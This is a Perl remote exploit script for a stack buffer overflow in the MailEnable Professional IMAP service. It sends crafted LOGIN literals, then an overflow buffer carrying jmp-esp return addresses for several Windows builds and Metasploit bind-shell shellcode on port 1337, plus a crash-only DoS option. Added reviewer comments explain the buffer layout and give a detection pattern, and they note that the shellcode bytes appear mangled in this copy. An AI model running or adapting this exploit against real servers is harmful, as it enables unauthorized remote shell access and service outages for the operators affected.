#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing is quite critical with this!!, so change $send_delay
# if it doesn\'t work....
#
########
#
# Reviewer notes (describing only what the code below does):
#
#   * This is a stand-alone proof-of-concept, not a library.  It connects
#     to TCP/143 on -t <host>, sends an IMAP LOGIN whose argument is
#     announced as a {24}-byte literal, follows it with two short literals,
#     and then sends one large buffer laid out as: 547 bytes of 'A'
#     padding, a 4-byte return address chosen by -n, 12 more 'A' bytes,
#     the shellcode, and 'A' filler sized so the total comes to 0x3ff
#     (1023) bytes when the address is 4 bytes wide.
#   * The payload is a Metasploit win32 *bind* shell on TCP/1337 (the
#     script prints an `nc <host> 1337` hint).  A bind shell has no
#     authentication: once it is listening, anyone who can reach that port
#     on the target gets the shell, not only the operator.
#   * Caveat for this copy of the listing: the shellcode and address
#     strings are shown as "x33xc9..." -- the \x escape prefixes appear
#     to have been stripped when the page was rendered, so as printed they
#     are plain text rather than the intended byte values.  Likewise the
#     "\n" line terminators of the protocol strings appear as trailing
#     spaces.  Treat the bytes here as archival, not as a faithful payload.
#   * Legacy hygiene: no `use strict`/`use warnings`; bareword filehandle
#     SOCKET; $buf/$iaddr/$paddr/$proto/$port are package globals;
#     `&usage;` and `&print_header;` use the `&name;` call form, which
#     also passes the caller's @_ (harmless here, both ignore arguments).
#     Return values of send() are never checked and nothing is read back,
#     so the "Successfully sent" message only means the bytes were handed
#     to the kernel, not that the exploit worked.
#   * Only run against systems you are authorized to test.  Detection
#     hint: an IMAP LOGIN with a literal-sized argument followed by a
#     ~1 KB run of repeated 0x41 ('A') bytes is the on-the-wire pattern.
#

# Options: -t <host> (required), -n <index into @offsets> (default 0).
use Getopt::Std;
getopts(\'t:n:\', \\%arg);
use Socket;

# metasploit win32 bindshell port 1337
# (the shell listens on TCP/1337 after exploitation; see notes above)
my $zshell_win32_bind = \"x33xc9x83xe9xb0\".
    \"x81xc4xd0xfdxffxff\".
    \"xd9xeexd9x74x24xf4x5bx81x73x13x1d\".
    \"xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96\".
    \"xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2\".
    \"x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0\".
    \"xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41\".
    \"x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82\".
    \"x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2\".
    \"x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39\".
    \"xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9\".
    \"x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b\".
    \"x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a\".
    \"x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88\".
    \"x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01\".
    \"xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20\".
    \"x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e\".
    \"xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39\".
    \"x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44\".
    \"xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96\".
    \"x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38\".
    \"xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9\".
    \"x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09\".
    \"x4ex33xe4x96xcdxccx32x69\";

# Return-address table, one entry per OS / service-pack build of
# KERNEL32.dll, each written as little-endian bytes.  The chosen entry
# overwrites EIP and is meant to land on an `ff e4` (jmp %esp) gadget so
# execution continues into the buffer.  -n selects by index (0..5); the
# last entry is deliberately invalid and only crashes the service (DoS).
# ff e4 -> jmp %esp
my @offsets = (
    \"xf8xfex5ax7c\", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
    \"xe2x48xe6x77\", # WinXP SP0 KERNEL32.dll 5.1.2600.0
    \"x06x38xe6x77\", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
    \"xd9xaex80x7c\", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
    \"x62x51xebx77\", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
    \"xefxbexadxde\"  # DoS
);

&print_header;

my $target;
my $offset;    # holds the -n index first, then the selected address bytes
if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
if (defined($arg{\'n\'})) { $offset = $arg{\'n\'} }
if (!(defined($target))) { &usage; }      # usage() exits with status 1
if (!(defined($offset))) { $offset = 0; }
# Only the upper bound is checked: a negative -n is accepted and indexes
# @offsets from the end (-1 picks the DoS entry); a non-numeric -n
# numifies to 0 silently because warnings are not enabled.
if ($offset > $#offsets) {
    print(\"only \".($#offsets+1).\" targets known!! \");
    exit(1);
} else {
    $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 1;      # seconds slept between sends; see timing note above
my $NOP = \'A\';           # filler byte (0x41); despite the name it is not a NOP
my $START_PAD = 547;     # bytes of filler before the EIP overwrite
my $SHELL_PAD = 12;      # bytes of filler between the address and the shellcode

if (connect_host($target, $imapd_port)) {
    print(\"-> * Connected \");
    # Step 1: IMAP LOGIN announcing a 24-byte literal argument.
    $buf = \"A001 LOGIN {24}\";
    send(SOCKET, $buf.\" \", 0);
    sleep($send_delay);
    print(\"-> * Sending payload \");
    # Steps 2-3: two short literals; the first itself announces a further
    # {20}-byte literal.  Nothing is read back between sends, hence the
    # fixed sleeps.
    send(SOCKET, \"AAAAAAAAAAAAAAAAA{20} \", 0);
    sleep($send_delay);
    send(SOCKET, \"BBBBBBBBBBBBBBBBBB \", 0);
    sleep($send_delay);
    # Step 4: the overflow buffer.  The filler term assumes $offset is 4
    # bytes wide (hence the "-4") so the whole buffer is 0x3ff bytes.
    $buf = ($NOP x $START_PAD).    # padding up to the EIP overwrite
           $offset.                # EIP: jmp %esp address from @offsets
           ($NOP x $SHELL_PAD).    # gap between the address and the code
           $zshell_win32_bind.     # bind-shell shellcode
           ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
    send(SOCKET, $buf, 0);
    # NOTE: send() results are unchecked and no server reply is read, so
    # these two lines report only that the bytes were queued.
    print(\"-> * Successfully sent payload! \");
    print(\"-> * nc \".$target.\" 1337 for shell... \");
}

# Prints the two-line banner.  Takes no arguments and returns nothing of
# interest; called as `&print_header;` at the top of the script.
sub print_header {
    print(\"MailEnable Pro <=v2.35 remote exploit \");
    print(\"by: <mu-b@digit-labs.org> \");
}

# Prints usage text and exits with status 1.  Reached when -t is missing.
# (The qq() text has lost its line breaks in this copy of the listing.)
sub usage {
    print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test -n <num> : return addy offset number ));
    exit(1);
}

# Opens a blocking TCP connection to ($target, $port) on the bareword
# global filehandle SOCKET and returns 1338 -- an arbitrary true value;
# the caller only tests truthiness.  There is no false-return path: every
# failure (name resolution, socket, connect) die()s with $!.
# Note that `($target, $port) = @_` assigns to the file-scope $target and
# to the package global $port, not to sub-local variables.
sub connect_host {
    ($target, $port) = @_;
    $iaddr = inet_aton($target) || die(\"Error: $! \");
    $paddr = sockaddr_in($port, $iaddr) || die(\"Error: $! \");
    $proto = getprotobyname(\'tcp\') || die(\"Error: $! \");
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $! 
\");
    connect(SOCKET, $paddr) || die(\"Error: $! \");
    return(1338);
}